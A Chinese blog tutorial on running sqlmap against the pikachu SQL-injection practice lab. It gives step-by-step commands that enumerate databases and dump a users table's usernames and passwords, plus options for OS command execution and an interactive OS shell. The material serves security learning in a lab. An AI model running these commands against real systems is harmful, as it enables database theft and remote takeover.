【网络安全学习】SQL注入02:使用sqlmap进行注入

最新推荐文章于 2024-08-09 17:06:15 发布
最新推荐文章于 2024-08-09 17:06:15 发布
阅读量433 收藏 8
点赞数 4
分类专栏: 网络安全基础 Kali渗透 网安工具 文章标签: web安全 学习 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oZuoGeQian/article/details/140954471
版权

1.sqlmap的基本功能

sqlmap的基本功能是对Web应用中的数据库进行自动化的检测、利用和攻击。

使用pikachu靶场进行sqlmap的基础功能使用。

1️⃣ 第一步:先检查是否有注入点:

# -u : 指定目标url,也就是指定注入点
sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2"

在这里插入图片描述

2️⃣ 第二步:再使用--dbs参数获取数据库。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --dbs
# --dbs : 读取数据库

在这里插入图片描述

3️⃣ 第三步:查看当前应用使用的数据库。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --current-db
# --current-db : 列出当前应用所用的数据库

在这里插入图片描述

4️⃣ 第四步:列出指定数据库的所有表。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --tables -D pikachu
# --tables : 获取数据库表
# -D : 指定数据库

在这里插入图片描述

5️⃣ 第五步:读取指定表中的字段名称。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --columns -T users -D pikachu
# --columns : 列取字段名

在这里插入图片描述

6️⃣ 第六步:读取指定字段内容。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --dump -C level,password,username -T users -D pikachu
# --dump : 为转存数据
# -C : 指定字段名称
# -T : 指定表名
# -D : 指定数据库名称。

在这里插入图片描述

在读取数据后,SQLMap将会把读取的数据转存到**SQLMap/output/目录下,文件以“[Table名].cvs**”保存.
在这里插入图片描述

通过以上步骤便完成了一个正常SQL注入并读取数据库数据的流程。

2. sqlmap参数

2.1 测试注入点权限

# 测试所有用户的权限
sqlmap -u "[URL]" --privileges
# 测试sa用户权限
sqlmap -u "[URL]" --privileges -U sa

2.2 执行Shel​l命令

# 执行net user命令
sqlmap -u "[URL]" --os-cmd="net user"
# 系统交互的shell
sqlmap -u "[URL]" --os-shell

2.3 获取当前数据库名称

sqlmap -u "[URL]" --current-db

2.4 执行SQL命令

# 返回sql交互的shell,执行sql语句
sqlmap -u "[URL]" --sql-shell

在这里插入图片描述

2.5 POST提交方式

sqlmap -u "[URL]" --data "POST参数"

2.6 显示详细的等级信息

sqlmap -u "[URL]" --dbs -v 1
# -v参数包含以下7个等级。
# 0:只显示Python的回溯、错误和关键消息;
# 1:显示信息和警告消息;
# 2:显示调试消息;
# 3:有效载荷注入;
# 4:显示HTTP请求;
# 5:显示HTTP响应头;
# 6:显示HTTP响应页面的内容。

2.7 注入HTTP请求

sqlmap -r head.txt --dbs
# head.txt中是HTTP请求的头信息

head.txt的内容大致如下:

POST /login.php HTTP/1.1
Host:www.xxx.com
User-Agent:Mozilla/5.0
username=xxx&yyy=zzz

2.8 使用SQLMap插件

sqlmap -u "[URL]" -tamper "插件名.py"

SQLMap可以使用插件,插件都保存在SQLMap目录下的tamper文件夹中,如下图所示:
在这里插入图片描述

关于SQLMap详细的使用可以参考官方说明:

https://github.com/sqlmapproject/sqlmap/wiki/Usage

🌟 以上就是SQLMap的一些基础的使用说明。 🌟

藏锋很佛系
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 sql注入工具sqlmap使用
01-13
网络安全sql注入工具sqlmap使用 Sqlmap是当前最流行的sql注入工具之一,广泛应用于网络安全领域,特别是在渗透测试和漏洞扫描领域。Sqlmap可以自动检测和利用SQL注入漏洞,获取数据库敏感信息,包括数据库结构、...
sqlmap sql 注入测试工具
03-06
1. SQL注入简介:SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码来操纵数据库查询,获取未经授权的数据访问权限,甚至控制整个数据库系统。SQLMap的出现使得测试和防范这一威胁变得更加高效。 2. ...
sql注入漏洞及其sqlmap工具的使用
Idealismi的博客
04-22 1591
代码层注入:代码层注入主要是因为,程序员在编写代码的时候、没有做严谨的代码过滤。3、攻击者的网络配置或者目标系统的操作系统原因,导致没有成功的发出或者接受。: 对所有的用户输入进行严格的验证和过滤,确保输入的数据符合预期 的格式和类型。1、首先进行判断注入点,如(get注入、post注入、cookie注入、http请求头注入等)原因:1、sql注入的语句错误、或者被目标系统采取了相应的保护措施、导致被过滤掉了。6、根据注入情况选择注入方式:时间盲注、布尔盲注、联合查询、报错注入
SQL 注入神器:SQLMap 简单使用
Flag少侠的博客
05-05 1384
第一处交互的地方是说这个目标系统的数据库好像是Mysql数据库,是否还探测其他类型的数据库第二处交互的地方是说对于剩下的测试,问我们是否想要使用扩展提供的级别第三处交互是说已经探测到参数id存在漏洞了,是否还探测其他地方。
网络安全Sql注入sqlmap
weixin_44277013的博客
08-07 1957
SQL注入漏洞从1998年圣诞节大火以来,长盛不衰,虽然开发人员想出各种方法对它进行围追堵截,却始终不能赶尽杀绝,sql注入的根本原因就是将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行。
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL 注入神器:SQLMap 参数详解
Flag少侠的博客
05-01 2373
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
网络安全-sql注入(5)】sqlmap以及几款自动化sql注入工具的详细使用过程(提供工具)
m0_67844671的博客
10-03 2481
本篇文章详细介绍了sqlmap工具和使用,如何用sqlmap进行自动化的SQL注入,还讲解了穿山甲,萝卜头等自动化SQL注入工具
sql注入sqlmap(渡栗的学习笔记)
2301_79998006的博客
06-17 1099
sqlmap使用Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。
sql注入原理及各姿势sqlmap使用
m0_63641882的博客
12-04 1431
ps:及后端服务器在收到参数未对参数进行过滤直接带入数据库当中进行查询,这样就导致了参数拼接构造的sql语句进行执行列子:当我们在前端进行页面登录的时候后端代码 输入用户admin和万能密码:2' or '1时后端代码 因为逻辑运算符有优先级之分 or
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 2868
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
使用sqlmap+burpsuite进行中级sql注入
06-01
网络安全领域,SQL注入是一种常见的攻击手段,通过利用应用程序对用户输入数据的不恰当处理,攻击者可以操纵SQL查询,获取、修改、删除数据库中的敏感信息。本篇将详细介绍如何结合sqlmap和BurpSuite工具进行中级...
sql注入攻击之sqlmap
06-10
SQL注入攻击是网络安全领域中的一个重要话题,它涉及数据库和Web应用程序的交互。SQL注入是指攻击者通过在输入字段中插入恶意的SQL代码,欺骗Web应用执行非授权的数据库操作,从而获取敏感信息或破坏数据库系统。...
SQL注入使用brupSuite辅助注入sqlmap使用
05-30
### SQL注入技术详解:利用Burp Suite与sqlmap进行安全测试 #### 一、SQL注入基础概念 SQL注入是一种常见的网络安全攻击方式,攻击者通过在应用程序的输入字段中插入恶意SQL代码来操纵后端数据库。这种攻击手段...
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
m0_57291352的博客
08-09 1162
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
重庆市合川区第二届网络安全“钓鱼城“杯部分题解
最新发布
m0_60894143的博客
08-09 578
下载文件后,进行分析往下划看见smb最开始以为是通过smb协议下载的文件找半天没发现,往前翻了翻,看见了flag存储为原始数据通过上述分析发现开头是pk,保存为zip压缩包发现需要密码感觉是伪加密使用工具一把梭再次打开压缩包就发现了flag证实了伪加密下载文件发现是内存文件直接工具分析volatility常规分析一波查看镜像信息分析进程发现没有异常查看cmd历史看到创建用户这个关键点先留意然后查看关键字发现有个zip直接导出到本地改为zip。
未来展望:等保测评在网络安全领域的持续创新与发展
A526847的博客
08-09 405
等保测评作为网络安全领域的重要制度,其持续创新与发展对于构建安全可信的网络环境具有重要意义。面对未来网络安全的新挑战和新机遇,等保测评将在技术创新、自动化提升、合规性强化、生态构建、主动防御理念深化以及人才培养等方面不断突破,为护航数字经济和工业互联网的安全发展提供坚实保障。
自学黑客(网络安全
2301_77160226的博客
08-05 2万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
SQL注入攻防:sqlmap工具详解
掌握SQLmap使用不仅能够提高安全测试的效率,还能确保测试的深度和广度,有效防范SQL注入攻击,保护网络安全。在实际应用中,结合网络安全知识,合理使用SQLmap进行漏洞检测,是每一个IT专业人员必备的技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值